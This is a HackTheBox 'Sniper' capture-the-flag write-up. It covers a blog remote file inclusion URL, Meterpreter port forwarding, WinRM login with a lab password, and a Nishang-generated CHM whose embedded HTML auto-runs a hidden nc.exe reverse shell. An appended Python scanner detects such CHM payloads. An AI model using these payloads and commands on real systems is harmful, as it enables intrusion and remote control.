Sniper @ HackTheBox

Sniper is a 30-point machine on HackTheBox. The path in involves abusing a remote file inclusion in the blog, and the path to administrator involves uploading a crafted CHM file that the local administrator opens automatically.

Notes

Remote File Inclusion:

http://10.10.10.151/blog/?lang=//<ip>/share/xct.php

Meterpreter port forward:

portfwd add -l 8000 -p 5985 -r 10.10.10.151

WinRM:

# Trust every remote host on the WinRM client (needed because we connect to a forwarded localhost port)
winrm set winrm/config/client '@{TrustedHosts="*"}'
# Allow CredSSP credential delegation from this client to any computer
Enable-WSManCredSSP -Role "Client" -DelegateComputer "*"
# Build a PSCredential for the user Chris
$user = 'Chris'
$pass = ConvertTo-SecureString -AsPlainText '36mEAhz/B8xQ~2VM' -Force
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
# Open a session through the Meterpreter port forward (localhost:8000 -> 10.10.10.151:5985) and enter it by Id
New-PSSession -URI http://localhost:8000/wsman -Credential $cred
Enter-PSSession -Id <id>

Generate CHM-Payload:

# Out-CHM is the Nishang cmdlet; it needs HTML Help Workshop installed to compile the .chm
Out-CHM -Payload "c:\programdata\nc.exe -e cmd.exe <ip> <port>" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Payload (the HTML page embedded in the generated CHM):

<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile c:\programdata\nc.exe -e cmd.exe <ip> <port>">
  <PARAM name="Item2" value="273,1,1">
</OBJECT>

<SCRIPT>
x.Click();
</SCRIPT>

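As an added example (not part of the original writeup), a small Python scanner for the HTML pages inside a CHM: it flags the HTML Help ShortCut object by its CLSID, recovers the command line it would launch from Item1, and checks whether a script auto-clicks it. It assumes the pages have already been extracted from the .chm (for example with hh.exe -decompile) and uses a constructed copy of the payload above with a placeholder address.

```python
from html.parser import HTMLParser
import re

# CLSID of the HTML Help "ShortCut" ActiveX control, as used in the payload above.
HH_SHORTCUT_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# Constructed sample: the payload above with a placeholder IP and port (192.0.2.1 4444).
SAMPLE_CHM_HTML = r'''<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",cmd.exe,/c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile c:\programdata\nc.exe -e cmd.exe 192.0.2.1 4444">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>'''

class _ObjectScanner(HTMLParser):
    """Collects every OBJECT element together with its PARAM name/value pairs."""
    def __init__(self):
        super().__init__()
        self.objects, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag.lower() == "object":
            self._cur = {"classid": a.get("classid", "").lower(), "params": {}}
            self.objects.append(self._cur)
        elif tag.lower() == "param" and self._cur is not None:
            self._cur["params"][a.get("name", "").lower()] = a.get("value", "")

    def handle_endtag(self, tag):
        if tag.lower() == "object":
            self._cur = None

def find_shortcut_commands(html):
    """Commands that ShortCut objects would launch; Item1 is "<window>,<program>,<arguments>"."""
    scanner = _ObjectScanner()
    scanner.feed(html)
    commands = []
    for obj in scanner.objects:
        if HH_SHORTCUT_CLSID not in obj["classid"] or obj["params"].get("command", "").lower() != "shortcut":
            continue
        parts = obj["params"].get("item1", "").split(",", 2)
        if len(parts) >= 2:  # parts[0] is the window name, which we do not need
            commands.append(" ".join(p.strip() for p in parts[1:] if p.strip()))
    return commands

def is_auto_triggered(html):
    """True when a script clicks the object itself, so merely opening the CHM runs the command."""
    return re.search(r"\.Click\s*\(", html, re.IGNORECASE) is not None
```

Running find_shortcut_commands on the sample returns one entry starting with "cmd.exe /c" and ending in the nc.exe reverse shell, and is_auto_triggered returns True because of the x.Click() script.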
This post is licensed under CC BY 4.0 by the author.